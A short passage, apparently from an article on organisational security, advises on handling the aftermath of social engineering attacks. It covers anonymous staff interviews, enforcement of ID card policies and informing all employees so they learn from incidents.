They may feel guilty about any information they may have divulged. I would suggest that a third party conduct these interviews anonymously, i.e. people do not have to give their names to the interviewer and the interview is carried out in confidence that no disciplinary action will be taken. The attack will have succeeded because of either a lack of controls or a lack of proper implementation, monitoring and enforcement of controls. Take the employee ID card as an example. Most policies state that "employees are required to have their ID cards visible at all times". Is this true for the organisation? Is this policy actually enforced? In my experience the companies that enforce this are few and far between.
The result of these attacks will usually be that your staff are more aware of just how easy it is to leak data without even knowing it. I feel that an organisation should notify all its staff when a social engineering style attack has been discovered so they may all learn from it. Remember that your staff are your first line of defence against a social engineer.